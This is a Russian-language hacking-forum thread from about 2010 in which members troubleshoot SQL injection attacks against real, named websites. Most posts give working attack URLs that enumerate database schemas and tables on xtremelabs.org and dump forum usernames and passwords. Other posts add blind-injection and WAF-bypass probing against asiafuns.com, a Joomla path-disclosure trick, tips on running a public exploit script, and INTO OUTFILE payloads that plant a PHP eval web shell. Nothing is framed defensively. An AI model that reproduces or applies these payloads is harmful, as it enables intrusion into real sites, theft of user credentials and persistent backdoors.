Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Поиск для чего на форуме!?
    Когда то было выполнение кода в админке, ща хз.

    https://forum.antichat.ru/threadnav189469-2-10-instant%2Bcms.html
     
    1 person likes this.
  2. KandidaT'S

    KandidaT'S New Member

    Joined:
    9 Jul 2010
    Messages:
    58
    Likes Received:
    3
    Reputations:
    0
    ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29,group_concat%28column_name%29,6,7+from+information_schema.columns+where+table_name=0x50524f46494c494e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING+--+ и нечего не получается =( в чём ошибака
     
  3. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+information_schema.PROFILING+--+

    Табла PROFILING - системная табла и в ней ничего полезного ты не найдешь, и она находится в счема information_schema. Поэтому перед таблой нужно написать счему откуда выводим.
     
  4. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    KandidaT'S, давай выведем таблицы:
    Ну, а дальше выбирай таблицы и выводи колонки таким образом :
    table_name=TABLE_NAME в Hex виде. Hex вид можно получить тут
    Затем, как выведешь колонки, выводи данные так:
    Где TABLE_NAME - имя таблицы откуда выводим.
     
  5. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    потому что там ничего нет, а вот это тебе будет интересней
    Code:
    http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,username,user_password),5,6,7+from+xtremelabs_forums.phpbbforums_users+limit+1,1+--+
     
    _________________________
    2 people like this.
  6. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    БД
    Code:
    http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28SCHEMA_NAME%20SEPARATOR%200x3a%29%20,5,6,7%20FROM%20information_schema.SCHEMATA
    information_schema:xtremelabs_forums:xtremelabs_site:xtremelabs_tforums

    Tables
    Code:
    http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28TABLE_NAME%20SEPARATOR%200x3a%29%20,5,6,7%20FROM%20information_schema.TABLES%20limit%200,1
    Code:
    http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,database%28%29%20,5,6,7%20FROM%20information_schema.TABLES%20limit%200,1
    БД текущая -> xtremelabs_site -> 0x787472656d656c6162735f73697465

    Code:
    http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28TABLE_NAME%20SEPARATOR%200x3a%29%20,5,6,7%20FROM%20information_schema.TABLES%20WHERE%20TABLE_SCHEMA=0x787472656d656c6162735f73697465
    admins:articles:articlescategories:categories:news:newscategories

    там нет таблицы PROFILING, она в другой БД.

    Code:
    http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,TABLE_SCHEMA%20%20,5,6,7+from+information_schema.TABLES+where+table_name=0x50524f46494c494e47%20--
    information_schema

    она в схеме :)
    Code:
    http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,%20count%28*%29%20,5,6,7%20FROM%20information_schema.PROFILING
    она пустая, там ниче нет. ;)
     
    #14906 Strilo4ka, 26 Sep 2010
    Last edited: 26 Sep 2010
    3 people like this.
  7. KandidaT'S

    KandidaT'S New Member

    Joined:
    9 Jul 2010
    Messages:
    58
    Likes Received:
    3
    Reputations:
    0
    Всем Спасибо
     
  8. Zilt0

    Zilt0 New Member

    Joined:
    1 Apr 2009
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Всем привет,
    как можно раскрыть пути в joomla 1.5.<, ?
     
  9. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    копипась моего поста, не помню где он.
    Joomla_1.5.15-Stable-Full_Package.zip
    у себя проверял
    Code:
    http://localhost/lastjoom/index.php?limitstart=-5
    может поможет.
     
    #14909 Strilo4ka, 26 Sep 2010
    Last edited: 27 Sep 2010
    1 person likes this.
  10. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    э хз как обойти в таком раскладе, может подскажем:
    http://localhost/script.php
    POST
    ref=BIG'

    что не пробовал на все одинаков ответ ((
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3

    Что за трабла тут со скобками?
     
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    ref=BIG') and 1=0 по идеи должен съесть но ничего из БД не выдать.
    ref=BIG') and 1=1 а так выдать
    ref=BIG') order by 10000 -- по идеи тоже должно сработать выдать Unknown column '10000'
    ну а дальше ты понял, и если у тебя на локалке, то привел бы код из скрипта, который обрабатывает переменную $_POST['ref'] и делает с ней запрос в БД
     
    _________________________
  12. Welemir

    Welemir Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    229
    Likes Received:
    11
    Reputations:
    -4
    Кто компилил сие чудо под gcc ? http://inj3ct0r.com/exploits/7595(паблик).Выдаёт кучу синтаксических ошибок.Разумеется,SunOs 5.10/5.11
     
  13. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    Его компилировать не надо, вроде, это sh скрипт.

    Создай файл, закинь в него содержимое сплойта, и запусти ./exploit.sh
     
    _________________________
    1 person likes this.
  14. Zilt0

    Zilt0 New Member

    Joined:
    1 Apr 2009
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Спасибо огромное,

    Но видимо не все версии подвержены, у некоторых не показывается,
     
  15. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    Вообще то вот так выглядит запрос по настояшему:
    Code:
    [B]script.php?Sex=female&YearFrom=18&YearTo=40'[/B]
    а ответ:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3

    на тот же
    Code:
    script.php?Sex=female&YearFrom=18&YearTo=40') order by 1000--
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') order by 1000--+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3

    пробовал разные варианты и floor rand не пашет ((
    PS.так как линк крупный не постил тут. Прошу помочь если у кого есть идеи
     
  16. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    script.php?res=1&Sex=female&YearFrom=11+YEAR)+and+1=if(substring(version(),1,1)=5,0,1)+--+
     
    _________________________
  17. Derec

    Derec Elder - Старейшина

    Joined:
    8 Nov 2007
    Messages:
    74
    Likes Received:
    4
    Reputations:
    0
    Друзья, по всей видимости есть уязвимость на одном сайте:
    http://site.com/feedback/index/20'

    при этом вижу ошибку:

    A Database Error Occurred
    Error Number: 1064

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27, 10' at line 6

    SELECT * FROM (`guestbook`) WHERE `parent` = 0 AND `moderated` = 1 ORDER BY `id` DESC LIMIT 20%27, 10​


    Первый раз столкнулся с таким типом sql-injection и тольком не получается ничего раскрутить. Как действовать в таком случае, подскажите?! :rolleyes:
     
  18. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    там фильтрация символов в движке, по этому ничего не выйдет.
     
    _________________________
    1 person likes this.
  19. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Инъекция в лимите.
    В данном случае инъекция не возможна из за присутствия order by.
    Если нет order by, то крутиться, как обычно, через union select
    Если позволяют условия, то попробуй сразу залить шелл:

    1 limit 1 into outfile '/path/shell.php' lines terminated by "<?php eval($_GET[cmd]);?>" --
    1 limit 1 into outfile '/path/shell.php' fields terminated by '' optionally enclosed by "<?php eval($_GET[cmd]);die();?>" --
     
    #14919 h00lyshit!, 28 Sep 2010
    Last edited: 28 Sep 2010
    4 people like this.
  20. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    вот тоже интересный случай:

    http://www.asiafuns.com/search_results.php?country=163+and+substring%28version%28%29,1,1%29=5+--+ все нормуль

    http://www.asiafuns.com/search_results.php?country=163+and+ascii%28substring%28%28select+column_name+from+information_schema.columns+limit+1,1%29,1,1%29%29%3E0+--+ редиректит на главную

    тоже самое если пробовать union select

    http://www.asiafuns.com/search_results.php?country=163+order+by+3+--+ норм

    http://www.asiafuns.com/search_results.php?country=163+union+select+1,2,3+--+ редирект

    попытки обхода с сменой регистра и добавлением комментариев /*!union+select*/ не проходит.

    в какую сторону копать?
     
Thread Status:
Not open for further replies.